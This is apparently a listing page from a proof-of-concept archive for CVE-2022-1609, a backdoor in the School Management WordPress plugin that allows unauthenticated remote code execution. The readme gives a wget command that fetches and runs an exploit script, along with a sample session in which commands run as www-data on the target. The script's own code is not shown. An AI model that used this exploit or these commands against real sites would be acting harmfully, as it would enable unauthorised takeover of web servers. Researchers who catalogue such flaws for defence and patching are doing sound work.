Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-1609 PoC — The School Management < 9.9.7 - Unauthenticated RCE via REST api

Source
https://github.com/0xSojalSec/CVE-2022-1609
Associated Vulnerability
Title:The School Management < 9.9.7 - Unauthenticated RCE via REST api (CVE-2022-1609)
Description:The School Management WordPress plugin before 9.9.7 contains an obfuscated backdoor injected in it's license checking code that registers a REST API handler, allowing an unauthenticated attacker to execute arbitrary PHP code on the site.
Description
Bash poc for CVE-2022-1609 WordPress Weblizar  Backdoor
Readme
# CVE-2022-1609
Bash poc for CVE-2022-1609 WordPress Weblizar  Backdoor

# How to install ?

```
wget https://raw.githubusercontent.com/NullBrunk/CVE-2022-1609/main/exploit.sh
chmod +x exploit.sh
./exploit.sh
```

# How to use it ?

```bash
NullBrunk$ ./exploit.sh http://127.0.0.1:8080
[+]  Targeting http://127.0.0.1:8080
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data

```
File Snapshot

 [4.0K]  /data/pocs/70c22e4dd0c72b5a02f7079e8f4b89ef6e61a732
├── [ 447]  exploit.sh
└── [ 406]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →